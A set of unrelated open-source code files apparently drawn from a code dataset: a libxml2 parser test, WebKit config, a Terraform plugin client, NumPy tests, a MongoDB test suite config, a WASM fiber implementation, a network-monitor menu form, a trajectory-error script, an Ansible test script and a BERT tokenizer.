ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
ctxt.parseChunk(chunk, len(chunk), 0)
ctxt=None
reference = "startDocument:startElement foo None:startElement bar2 None:"
if log != reference:
print "Error got: %s" % log
print "Exprected: %s" % reference
sys.exit(1)
log=""
chunk="""<foo><bar2 a="1" b='2' />"""
ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
ctxt.parseChunk(chunk, len(chunk), 0)
ctxt=None
reference = "startDocument:startElement foo None:startElement bar2 {'a': '1', 'b': '2'}:endElement bar2:"
if log != reference:
print "Error got: %s" % log
print "Exprected: %s" % reference
sys.exit(1)
log=""
chunk="""<foo><bar2 a="1" b='2' >"""
ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
ctxt.parseChunk(chunk, len(chunk), 0)
ctxt=None
reference = "startDocument:startElement foo None:startElement bar2 {'a': '1', 'b': '2'}:"
if log != reference:
print "Error got: %s" % log
print "Exprected: %s" % reference
sys.exit(1)
log=""
chunk="""<foo><bar2 a="1" b='2' ></bar2>"""
ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
ctxt.parseChunk(chunk, len(chunk), 0)
ctxt=None
reference = "startDocument:startElement foo None:startElement bar2 {'a': '1', 'b': '2'}:endElement bar2:"
if log != reference:
print "Error got: %s" % log
print "Exprected: %s" % reference
sys.exit(1)
log=""
chunk="""<foo><bar2 a="b='1' />"""
ctxt = libxml2.createPushParser(handler, None, 0, "test.xml")
ctxt.parseChunk(chunk, len(chunk), 0)
ctxt=None
reference = "startDocument:startElement foo None:"
if log != reference:
print "Error got: %s" % log
print "Exprected: %s" % reference
sys.exit(1)
# Memory debug specific
libxml2.cleanupParser()
if libxml2.debugMemory(1) == 0:
print "OK"
else:
print "Memory leak %d bytes" % (libxml2.debugMemory(1))
libxml2.dumpMemory()
|
unknown
|
codeparrot/codeparrot-clean
| ||
# Copyright (c) 2010, Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
def view_source_url(local_path):
return "http://trac.webkit.org/browser/trunk/%s" % local_path
def view_revision_url(revision_number):
return "http://trac.webkit.org/changeset/%s" % revision_number
contribution_guidelines = "http://webkit.org/coding/contributing.html"
bug_server_domain = "webkit.org"
bug_server_host = "bugs." + bug_server_domain
_bug_server_regex = "https?://%s/" % re.sub('\.', '\\.', bug_server_host)
bug_server_url = "https://%s/" % bug_server_host
bug_url_long = _bug_server_regex + r"show_bug\.cgi\?id=(?P<bug_id>\d+)(&ctype=xml|&excludefield=attachmentdata)*"
bug_url_short = r"https?\://%s/b/(?P<bug_id>\d+)" % bug_server_domain
attachment_url = _bug_server_regex + r"attachment\.cgi\?id=(?P<attachment_id>\d+)(&action=(?P<action>\w+))?"
direct_attachment_url = r"https?://bug-(?P<bug_id>\d+)-attachments.%s/attachment\.cgi\?id=(?P<attachment_id>\d+)" % bug_server_domain
buildbot_url = "http://build.webkit.org"
def parse_bug_id(string):
if not string:
return None
match = re.search(bug_url_short, string)
if match:
return int(match.group('bug_id'))
match = re.search(bug_url_long, string)
if match:
return int(match.group('bug_id'))
return None
def parse_attachment_id(string):
if not string:
return None
match = re.search(attachment_url, string)
if match:
return int(match.group('attachment_id'))
match = re.search(direct_attachment_url, string)
if match:
return int(match.group('attachment_id'))
return None
|
unknown
|
codeparrot/codeparrot-clean
| ||
// Copyright (c) HashiCorp, Inc.
// SPDX-License-Identifier: BUSL-1.1
package cloudplugin1
import (
"context"
"fmt"
"io"
"log"
"github.com/hashicorp/terraform/internal/cloudplugin/cloudproto1"
"github.com/hashicorp/terraform/internal/pluginshared"
)
// GRPCCloudClient is the client interface for interacting with terraform-cloudplugin
type GRPCCloudClient struct {
client cloudproto1.CommandServiceClient
context context.Context
}
// Proof that GRPCCloudClient fulfills the go-plugin interface
var _ pluginshared.CustomPluginClient = GRPCCloudClient{}
// Execute sends the client Execute request and waits for the plugin to return
// an exit code response before returning
func (c GRPCCloudClient) Execute(args []string, stdout, stderr io.Writer) int {
client, err := c.client.Execute(c.context, &cloudproto1.CommandRequest{
Args: args,
})
if err != nil {
fmt.Fprint(stderr, err.Error())
return 1
}
for {
// cloudplugin streams output as multiple CommandResponse value. Each
// value will either contain stdout bytes, stderr bytes, or an exit code.
response, err := client.Recv()
if err == io.EOF {
log.Print("[DEBUG] received EOF from cloudplugin")
break
} else if err != nil {
fmt.Fprintf(stderr, "Failed to receive command response from cloudplugin: %s", err)
return 1
}
if bytes := response.GetStdout(); len(bytes) > 0 {
written, err := fmt.Fprint(stdout, string(bytes))
if err != nil {
log.Printf("[ERROR] Failed to write cloudplugin output to stdout: %s", err)
return 1
}
if written != len(bytes) {
log.Printf("[ERROR] Wrote %d bytes to stdout but expected to write %d", written, len(bytes))
}
} else if bytes := response.GetStderr(); len(bytes) > 0 {
written, err := fmt.Fprint(stderr, string(bytes))
if err != nil {
log.Printf("[ERROR] Failed to write cloudplugin output to stderr: %s", err)
return 1
}
if written != len(bytes) {
log.Printf("[ERROR] Wrote %d bytes to stdout but expected to write %d", written, len(bytes))
}
} else {
exitCode := response.GetExitCode()
log.Printf("[TRACE] received exit code: %d", exitCode)
if exitCode < 0 || exitCode > 255 {
log.Printf("[ERROR] cloudplugin returned an invalid error code %d", exitCode)
return 255
}
return int(exitCode)
}
}
// This should indicate a bug in the plugin
fmt.Fprint(stderr, "cloudplugin exited without responding with an error code")
return 1
}
|
go
|
github
|
https://github.com/hashicorp/terraform
|
internal/cloudplugin/cloudplugin1/grpc_client.go
|
"""
Test scalar buffer interface adheres to PEP 3118
"""
import pytest
import numpy as np
from numpy._core._multiarray_tests import get_buffer_info
from numpy._core._rational_tests import rational
from numpy.testing import assert_, assert_equal, assert_raises
# PEP3118 format strings for native (standard alignment and byteorder) types
scalars_and_codes = [
(np.bool, '?'),
(np.byte, 'b'),
(np.short, 'h'),
(np.intc, 'i'),
(np.long, 'l'),
(np.longlong, 'q'),
(np.ubyte, 'B'),
(np.ushort, 'H'),
(np.uintc, 'I'),
(np.ulong, 'L'),
(np.ulonglong, 'Q'),
(np.half, 'e'),
(np.single, 'f'),
(np.double, 'd'),
(np.longdouble, 'g'),
(np.csingle, 'Zf'),
(np.cdouble, 'Zd'),
(np.clongdouble, 'Zg'),
]
scalars_only, codes_only = zip(*scalars_and_codes)
class TestScalarPEP3118:
@pytest.mark.parametrize('scalar', scalars_only, ids=codes_only)
def test_scalar_match_array(self, scalar):
x = scalar()
a = np.array([], dtype=np.dtype(scalar))
mv_x = memoryview(x)
mv_a = memoryview(a)
assert_equal(mv_x.format, mv_a.format)
@pytest.mark.parametrize('scalar', scalars_only, ids=codes_only)
def test_scalar_dim(self, scalar):
x = scalar()
mv_x = memoryview(x)
assert_equal(mv_x.itemsize, np.dtype(scalar).itemsize)
assert_equal(mv_x.ndim, 0)
assert_equal(mv_x.shape, ())
assert_equal(mv_x.strides, ())
assert_equal(mv_x.suboffsets, ())
@pytest.mark.parametrize('scalar, code', scalars_and_codes, ids=codes_only)
def test_scalar_code_and_properties(self, scalar, code):
x = scalar()
expected = {'strides': (), 'itemsize': x.dtype.itemsize, 'ndim': 0,
'shape': (), 'format': code, 'readonly': True}
mv_x = memoryview(x)
assert self._as_dict(mv_x) == expected
@pytest.mark.parametrize('scalar', scalars_only, ids=codes_only)
def test_scalar_buffers_readonly(self, scalar):
x = scalar()
with pytest.raises(BufferError, match="scalar buffer is readonly"):
get_buffer_info(x, ["WRITABLE"])
def test_void_scalar_structured_data(self):
dt = np.dtype([('name', np.str_, 16), ('grades', np.float64, (2,))])
x = np.array(('ndarray_scalar', (1.2, 3.0)), dtype=dt)[()]
assert_(isinstance(x, np.void))
mv_x = memoryview(x)
expected_size = 16 * np.dtype((np.str_, 1)).itemsize
expected_size += 2 * np.dtype(np.float64).itemsize
assert_equal(mv_x.itemsize, expected_size)
assert_equal(mv_x.ndim, 0)
assert_equal(mv_x.shape, ())
assert_equal(mv_x.strides, ())
assert_equal(mv_x.suboffsets, ())
# check scalar format string against ndarray format string
a = np.array([('Sarah', (8.0, 7.0)), ('John', (6.0, 7.0))], dtype=dt)
assert_(isinstance(a, np.ndarray))
mv_a = memoryview(a)
assert_equal(mv_x.itemsize, mv_a.itemsize)
assert_equal(mv_x.format, mv_a.format)
# Check that we do not allow writeable buffer export (technically
# we could allow it sometimes here...)
with pytest.raises(BufferError, match="scalar buffer is readonly"):
get_buffer_info(x, ["WRITABLE"])
def _as_dict(self, m):
return {'strides': m.strides, 'shape': m.shape, 'itemsize': m.itemsize,
'ndim': m.ndim, 'format': m.format, 'readonly': m.readonly}
def test_datetime_memoryview(self):
# gh-11656
# Values verified with v1.13.3, shape is not () as in test_scalar_dim
dt1 = np.datetime64('2016-01-01')
dt2 = np.datetime64('2017-01-01')
expected = {'strides': (1,), 'itemsize': 1, 'ndim': 1, 'shape': (8,),
'format': 'B', 'readonly': True}
v = memoryview(dt1)
assert self._as_dict(v) == expected
v = memoryview(dt2 - dt1)
assert self._as_dict(v) == expected
dt = np.dtype([('a', 'uint16'), ('b', 'M8[s]')])
a = np.empty(1, dt)
# Fails to create a PEP 3118 valid buffer
assert_raises((ValueError, BufferError), memoryview, a[0])
# Check that we do not allow writeable buffer export
with pytest.raises(BufferError, match="scalar buffer is readonly"):
get_buffer_info(dt1, ["WRITABLE"])
@pytest.mark.parametrize('s', [
pytest.param("\x32\x32", id="ascii"),
pytest.param("\uFE0F\uFE0F", id="basic multilingual"),
pytest.param("\U0001f4bb\U0001f4bb", id="non-BMP"),
])
def test_str_ucs4(self, s):
s = np.str_(s) # only our subclass implements the buffer protocol
# all the same, characters always encode as ucs4
expected = {'strides': (), 'itemsize': 8, 'ndim': 0, 'shape': (),
'format': '2w', 'readonly': True}
v = memoryview(s)
assert self._as_dict(v) == expected
# integers of the paltform-appropriate endianness
code_points = np.frombuffer(v, dtype='i4')
assert_equal(code_points, [ord(c) for c in s])
# Check that we do not allow writeable buffer export
with pytest.raises(BufferError, match="scalar buffer is readonly"):
get_buffer_info(s, ["WRITABLE"])
def test_user_scalar_fails_buffer(self):
r = rational(1)
with assert_raises(TypeError):
memoryview(r)
# Check that we do not allow writeable buffer export
with pytest.raises(BufferError, match="scalar buffer is readonly"):
get_buffer_info(r, ["WRITABLE"])
|
python
|
github
|
https://github.com/numpy/numpy
|
numpy/_core/tests/test_scalarbuffer.py
|
##########################################################
# THIS IS A GENERATED FILE -- DO NOT MODIFY.
# IF YOU WISH TO MODIFY THIS SUITE, MODIFY THE CORRESPONDING MATRIX SUITE MAPPING FILE
# AND REGENERATE THE MATRIX SUITES.
#
# matrix suite mapping file: buildscripts/resmokeconfig/matrix_suites/mappings/replica_sets_jscore_passthrough_execution_control_with_prioritization.yml
# regenerate matrix suites: buildscripts/resmoke.py generate-matrix-suites
##########################################################
executor:
archive:
hooks:
- RunDBCheckInBackground
- CheckReplDBHashInBackground
- ValidateCollectionsInBackground
- CheckReplDBHash
- CheckReplOplogs
- ValidateCollections
config:
shell_options:
eval: globalThis.testingReplication = true;
fixture:
class: ReplicaSetFixture
mongod_options:
set_parameters:
enableTestCommands: 1
executionControlDeprioritizationGate: true
num_nodes: 2
hooks:
- class: RunDBCheckInBackground
- class: CheckReplDBHashInBackground
- class: ValidateCollectionsInBackground
- class: CheckReplOplogs
- class: CheckReplDBHash
- class: ValidateCollections
- class: CleanEveryN
n: 20
matrix_suite: true
selector:
exclude_files:
- jstests/core/txns/abort_expired_transaction.js
- jstests/core/txns/abort_transaction_thread_does_not_block_on_locks.js
- jstests/core/txns/kill_op_on_txn_expiry.js
- jstests/core/**/set_param1.js
- jstests/core/query/awaitdata_getmore_cmd.js
- jstests/core/administrative/current_op/currentop.js
- jstests/core/administrative/fsync/fsync.js
- jstests/core/txns/prepare_conflict.js
- jstests/core/txns/prepare_conflict_aggregation_behavior.js
- jstests/core/timeseries/write/timeseries_update_multi.js
exclude_with_any_tags:
- assumes_standalone_mongod
- requires_profiling
roots:
- jstests/core/**/*.js
- jstests/fle2/**/*.js
- src/mongo/db/modules/*/jstests/fle2/**/*.js
test_kind: js_test
|
unknown
|
github
|
https://github.com/mongodb/mongo
|
buildscripts/resmokeconfig/matrix_suites/generated_suites/replica_sets_jscore_passthrough_execution_control_with_prioritization.yml
|
/*
This is a ucontext-like userland context switching API for WebAssembly based on Binaryen's Asyncify.
* NOTE:
* This mechanism doesn't take care of stack state. Just save and restore program counter and
* registers (rephrased as locals by Wasm term). So use-site need to save and restore the C stack pointer.
* This Asyncify based implementation is not much efficient and will be replaced with future stack-switching feature.
*/
#include <stdlib.h>
#include "wasm/fiber.h"
#include "wasm/asyncify.h"
#ifdef RB_WASM_ENABLE_DEBUG_LOG
# include <stdio.h>
# define RB_WASM_DEBUG_LOG(...) fprintf(stderr, __VA_ARGS__)
#else
# define RB_WASM_DEBUG_LOG(...)
#endif
void
rb_wasm_init_context(rb_wasm_fiber_context *fcp, void (*func)(void *, void *), void *arg0, void *arg1)
{
fcp->asyncify_buf.top = &fcp->asyncify_buf.buffer[0];
fcp->asyncify_buf.end = &fcp->asyncify_buf.buffer[WASM_FIBER_STACK_BUFFER_SIZE];
fcp->is_rewinding = false;
fcp->is_started = false;
fcp->entry_point = func;
fcp->arg0 = arg0;
fcp->arg1 = arg1;
RB_WASM_DEBUG_LOG("[%s] fcp->asyncify_buf %p\n", __func__, &fcp->asyncify_buf);
}
static rb_wasm_fiber_context *_rb_wasm_active_next_fiber;
void
rb_wasm_swapcontext(rb_wasm_fiber_context *ofcp, rb_wasm_fiber_context *fcp)
{
RB_WASM_DEBUG_LOG("[%s] enter ofcp = %p fcp = %p\n", __func__, ofcp, fcp);
if (ofcp->is_rewinding) {
asyncify_stop_rewind();
ofcp->is_rewinding = false;
return;
}
_rb_wasm_active_next_fiber = fcp;
RB_WASM_DEBUG_LOG("[%s] start unwinding asyncify_buf = %p\n", __func__, &ofcp->asyncify_buf);
asyncify_start_unwind(&ofcp->asyncify_buf);
}
void *
rb_wasm_handle_fiber_unwind(void (**new_fiber_entry)(void *, void *),
void **arg0, void **arg1, bool *is_new_fiber_started)
{
rb_wasm_fiber_context *next_fiber;
if (!_rb_wasm_active_next_fiber) {
RB_WASM_DEBUG_LOG("[%s] no next fiber\n", __func__);
*is_new_fiber_started = false;
return NULL;
}
next_fiber = _rb_wasm_active_next_fiber;
_rb_wasm_active_next_fiber = NULL;
RB_WASM_DEBUG_LOG("[%s] next_fiber->asyncify_buf = %p\n", __func__, &next_fiber->asyncify_buf);
*new_fiber_entry = next_fiber->entry_point;
*arg0 = next_fiber->arg0;
*arg1 = next_fiber->arg1;
if (!next_fiber->is_started) {
RB_WASM_DEBUG_LOG("[%s] new fiber started\n", __func__);
// start a new fiber if not started yet.
next_fiber->is_started = true;
*is_new_fiber_started = true;
return NULL;
} else {
RB_WASM_DEBUG_LOG("[%s] resume a fiber\n", __func__);
// resume a fiber again
next_fiber->is_rewinding = true;
*is_new_fiber_started = false;
return &next_fiber->asyncify_buf;
}
}
|
c
|
github
|
https://github.com/ruby/ruby
|
wasm/fiber.c
|
from tools import widget_form, widget_menu
class SiteForm:
def __init__(self, sitename, timingtemplate, description):
self.menulist = []
n = self.__class__.__name__
self.menudata = {
'_text': '',
'_backtitle': 'Developed by Bernhard - Module: ' + n,
'_title': 'Lidskjalv - Network Monitor'
}
self.sitename = sitename
self.timingtemplate = timingtemplate
self.description = description
def form_standard(self):
t = "Add a new site"
tab = 43
lj = 18
e = (
("Site name:".ljust(lj), 1, 1, '', 1, tab, 31, 31),
("Timing template:".ljust(lj), 3, 1, '', 3, tab, 31, 31),
("Description:".ljust(lj), 5, 1, '', 5, tab, 31, 31)
)
res = widget_form(t, e)
print(res)
def timing_template_form(self, tt):
n = self.__class__.__name__
menudata = {
'_text': '0 - 1: Very hard to detect.\n4 - 5: Detectable scan',
'_backtitle': 'Developed by Bernhard - Module: ' + n,
'_title': 'Lidskjalv - Timing Template'
}
menulist = []
menulist.append(["0", "Paranoid"])
menulist.append(["1", "Sneaky"])
menulist.append(["2", "Polite"])
menulist.append(["3", "Normal"])
menulist.append(["4", "Aggressive"])
menulist.append(["5", "Insane"])
code, tag = widget_menu(menulist, menudata)
tag = int(tag)
print(tag)
return tag
def main(self):
while True:
self.buildmenu()
code, tag = widget_menu(self.menulist, self.menudata)
if code == "ok":
if tag == "Site name":
self.sitename = self.inputbox(
"Add a name for the site:",
"Site name:",
self.sitename)
if tag == "Timing template":
self.timingtemplate = self.timing_template_form(
self.timingtemplate)
if tag == "Description":
self.description = self.inputbox(
"Add a description for the site:",
"Description:",
self.description)
if tag == "Cancel":
return None
if tag == "Done":
return [
self.sitename,
self.timingtemplate,
self.description]
def inputbox(self, t, label, value):
lj = len(label) + 4
e = ((label, 1, 1, value, 1, lj, 50, 50),)
res = widget_form(t, e)
print(res[1][0])
return res[1][0]
def buildmenu(self):
self.menulist = []
self.menulist.append(["Site name", self.sitename])
self.menulist.append(["Timing template", str(self.timingtemplate)])
self.menulist.append(["Description", self.description])
self.menulist.append(["", ""])
self.menulist.append(["Done", ""])
self.menulist.append(["Cancel", ""])
if __name__ == '__main__':
print("This is a module.",
"Please run the lidskjalvmanager in the future.")
# o = SiteForm("", "4", "")
# print(o.main())
# o.timing_template(2)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/python
# Software License Agreement (BSD License)
#
# Copyright (c) 2013, Juergen Sturm, TUM
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of TUM nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# Requirements:
# sudo apt-get install python-argparse
"""
This script computes the absolute trajectory error from the ground truth
trajectory and the estimated trajectory.
"""
import sys
import numpy
import argparse
import associate
def align(model,data):
"""Align two trajectories using the method of Horn (closed-form).
Input:
model -- first trajectory (3xn)
data -- second trajectory (3xn)
Output:
rot -- rotation matrix (3x3)
trans -- translation vector (3x1)
trans_error -- translational error per point (1xn)
"""
numpy.set_printoptions(precision=3,suppress=True)
model_zerocentered = model - model.mean(1)
data_zerocentered = data - data.mean(1)
W = numpy.zeros( (3,3) )
for column in range(model.shape[1]):
W += numpy.outer(model_zerocentered[:,column],data_zerocentered[:,column])
U,d,Vh = numpy.linalg.linalg.svd(W.transpose())
S = numpy.matrix(numpy.identity( 3 ))
if(numpy.linalg.det(U) * numpy.linalg.det(Vh)<0):
S[2,2] = -1
rot = U*S*Vh
trans = data.mean(1) - rot * model.mean(1)
model_aligned = rot * model + trans
alignment_error = model_aligned - data
trans_error = numpy.sqrt(numpy.sum(numpy.multiply(alignment_error,alignment_error),0)).A[0]
return rot,trans,trans_error
def plot_traj(ax,stamps,traj,style,color,label):
"""
Plot a trajectory using matplotlib.
Input:
ax -- the plot
stamps -- time stamps (1xn)
traj -- trajectory (3xn)
style -- line style
color -- line color
label -- plot legend
"""
stamps.sort()
interval = numpy.median([s-t for s,t in zip(stamps[1:],stamps[:-1])])
x = []
y = []
last = stamps[0]
for i in range(len(stamps)):
if stamps[i]-last < 2*interval:
x.append(traj[i][0])
y.append(traj[i][1])
elif len(x)>0:
ax.plot(x,y,style,color=color,label=label)
label=""
x=[]
y=[]
last= stamps[i]
if len(x)>0:
ax.plot(x,y,style,color=color,label=label)
if __name__=="__main__":
# parse command line
parser = argparse.ArgumentParser(description='''
This script computes the absolute trajectory error from the ground truth trajectory and the estimated trajectory.
''')
parser.add_argument('first_file', help='ground truth trajectory (format: timestamp tx ty tz qx qy qz qw)')
parser.add_argument('second_file', help='estimated trajectory (format: timestamp tx ty tz qx qy qz qw)')
parser.add_argument('--offset', help='time offset added to the timestamps of the second file (default: 0.0)',default=0.0)
parser.add_argument('--scale', help='scaling factor for the second trajectory (default: 1.0)',default=1.0)
parser.add_argument('--max_difference', help='maximally allowed time difference for matching entries (default: 0.02)',default=0.02)
parser.add_argument('--save', help='save aligned second trajectory to disk (format: stamp2 x2 y2 z2)')
parser.add_argument('--save_associations', help='save associated first and aligned second trajectory to disk (format: stamp1 x1 y1 z1 stamp2 x2 y2 z2)')
parser.add_argument('--plot', help='plot the first and the aligned second trajectory to an image (format: png)')
parser.add_argument('--verbose', help='print all evaluation data (otherwise, only the RMSE absolute translational error in meters after alignment will be printed)', action='store_true')
args = parser.parse_args()
first_list = associate.read_file_list(args.first_file)
second_list = associate.read_file_list(args.second_file)
matches = associate.associate(first_list, second_list,float(args.offset),float(args.max_difference))
if len(matches)<2:
sys.exit("Couldn't find matching timestamp pairs between groundtruth and estimated trajectory! Did you choose the correct sequence?")
first_xyz = numpy.matrix([[float(value) for value in first_list[a][0:3]] for a,b in matches]).transpose()
second_xyz = numpy.matrix([[float(value)*float(args.scale) for value in second_list[b][0:3]] for a,b in matches]).transpose()
rot,trans,trans_error = align(second_xyz,first_xyz)
second_xyz_aligned = rot * second_xyz + trans
first_stamps = first_list.keys()
first_stamps.sort()
first_xyz_full = numpy.matrix([[float(value) for value in first_list[b][0:3]] for b in first_stamps]).transpose()
second_stamps = second_list.keys()
second_stamps.sort()
second_xyz_full = numpy.matrix([[float(value)*float(args.scale) for value in second_list[b][0:3]] for b in second_stamps]).transpose()
second_xyz_full_aligned = rot * second_xyz_full + trans
if args.verbose:
print "compared_pose_pairs %d pairs"%(len(trans_error))
print "absolute_translational_error.rmse %f m"%numpy.sqrt(numpy.dot(trans_error,trans_error) / len(trans_error))
print "absolute_translational_error.mean %f m"%numpy.mean(trans_error)
print "absolute_translational_error.median %f m"%numpy.median(trans_error)
print "absolute_translational_error.std %f m"%numpy.std(trans_error)
print "absolute_translational_error.min %f m"%numpy.min(trans_error)
print "absolute_translational_error.max %f m"%numpy.max(trans_error)
else:
print "%f"%numpy.sqrt(numpy.dot(trans_error,trans_error) / len(trans_error))
if args.save_associations:
file = open(args.save_associations,"w")
file.write("\n".join(["%f %f %f %f %f %f %f %f"%(a,x1,y1,z1,b,x2,y2,z2) for (a,b),(x1,y1,z1),(x2,y2,z2) in zip(matches,first_xyz.transpose().A,second_xyz_aligned.transpose().A)]))
file.close()
if args.save:
file = open(args.save,"w")
file.write("\n".join(["%f "%stamp+" ".join(["%f"%d for d in line]) for stamp,line in zip(second_stamps,second_xyz_full_aligned.transpose().A)]))
file.close()
if args.plot:
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import matplotlib.pylab as pylab
from matplotlib.patches import Ellipse
fig = plt.figure()
ax = fig.add_subplot(111)
plot_traj(ax,first_stamps,first_xyz_full.transpose().A,'-',"black","ground truth")
plot_traj(ax,second_stamps,second_xyz_full_aligned.transpose().A,'-',"blue","estimated")
label="difference"
for (a,b),(x1,y1,z1),(x2,y2,z2) in zip(matches,first_xyz.transpose().A,second_xyz_aligned.transpose().A):
ax.plot([x1,x2],[y1,y2],'-',color="red",label=label)
label=""
ax.legend()
ax.set_xlabel('x [m]')
ax.set_ylabel('y [m]')
plt.savefig(args.plot,dpi=90)
|
unknown
|
codeparrot/codeparrot-clean
| ||
#!/usr/bin/env bash
set -eux
[ -f "${INVENTORY}" ]
ANSIBLE_HOST_KEY_CHECKING=false ansible-playbook download_binary_modules.yml -i "${INVENTORY}" -v "$@"
ANSIBLE_HOST_KEY_CHECKING=false ansible-playbook test_binary_modules.yml -i "${INVENTORY}" -v "$@"
|
unknown
|
github
|
https://github.com/ansible/ansible
|
test/integration/targets/binary_modules/test.sh
|
# Copyright 2018 The Google AI Language Team Authors and The HuggingFace Inc. team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization classes for Bert."""
import collections
import os
import unicodedata
from ...tokenization_python import PreTrainedTokenizer, _is_control, _is_punctuation, _is_whitespace
from ...utils import logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {"vocab_file": "vocab.txt"}
def load_vocab(vocab_file):
"""Loads a vocabulary file into a dictionary."""
vocab = collections.OrderedDict()
with open(vocab_file, "r", encoding="utf-8") as reader:
tokens = reader.readlines()
for index, token in enumerate(tokens):
token = token.rstrip("\n")
vocab[token] = index
return vocab
def whitespace_tokenize(text):
"""Runs basic whitespace cleaning and splitting on a piece of text."""
text = text.strip()
if not text:
return []
tokens = text.split()
return tokens
class BertTokenizerLegacy(PreTrainedTokenizer):
r"""
Construct a BERT tokenizer. Based on WordPiece.
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
File containing the vocabulary.
do_lower_case (`bool`, *optional*, defaults to `True`):
Whether or not to lowercase the input when tokenizing.
do_basic_tokenize (`bool`, *optional*, defaults to `True`):
Whether or not to do basic tokenization before WordPiece.
never_split (`Iterable`, *optional*):
Collection of tokens which will never be split during tokenization. Only has an effect when
`do_basic_tokenize=True`
unk_token (`str`, *optional*, defaults to `"[UNK]"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
sep_token (`str`, *optional*, defaults to `"[SEP]"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
pad_token (`str`, *optional*, defaults to `"[PAD]"`):
The token used for padding, for example when batching sequences of different lengths.
cls_token (`str`, *optional*, defaults to `"[CLS]"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
mask_token (`str`, *optional*, defaults to `"[MASK]"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
tokenize_chinese_chars (`bool`, *optional*, defaults to `True`):
Whether or not to tokenize Chinese characters.
This should likely be deactivated for Japanese (see this
[issue](https://github.com/huggingface/transformers/issues/328)).
strip_accents (`bool`, *optional*):
Whether or not to strip all accents. If this option is not specified, then it will be determined by the
value for `lowercase` (as in the original BERT).
clean_up_tokenization_spaces (`bool`, *optional*, defaults to `True`):
Whether or not to cleanup spaces after decoding, cleanup consists in removing potential artifacts like
extra spaces.
"""
vocab_files_names = VOCAB_FILES_NAMES
def __init__(
self,
vocab_file,
do_lower_case=True,
do_basic_tokenize=True,
never_split=None,
unk_token="[UNK]",
sep_token="[SEP]",
pad_token="[PAD]",
cls_token="[CLS]",
mask_token="[MASK]",
tokenize_chinese_chars=True,
strip_accents=None,
clean_up_tokenization_spaces=True,
**kwargs,
):
if not os.path.isfile(vocab_file):
raise ValueError(
f"Can't find a vocabulary file at path '{vocab_file}'. To load the vocabulary from a Google pretrained"
" model use `tokenizer = BertTokenizer.from_pretrained(PRETRAINED_MODEL_NAME)`"
)
self.vocab = load_vocab(vocab_file)
self.ids_to_tokens = collections.OrderedDict([(ids, tok) for tok, ids in self.vocab.items()])
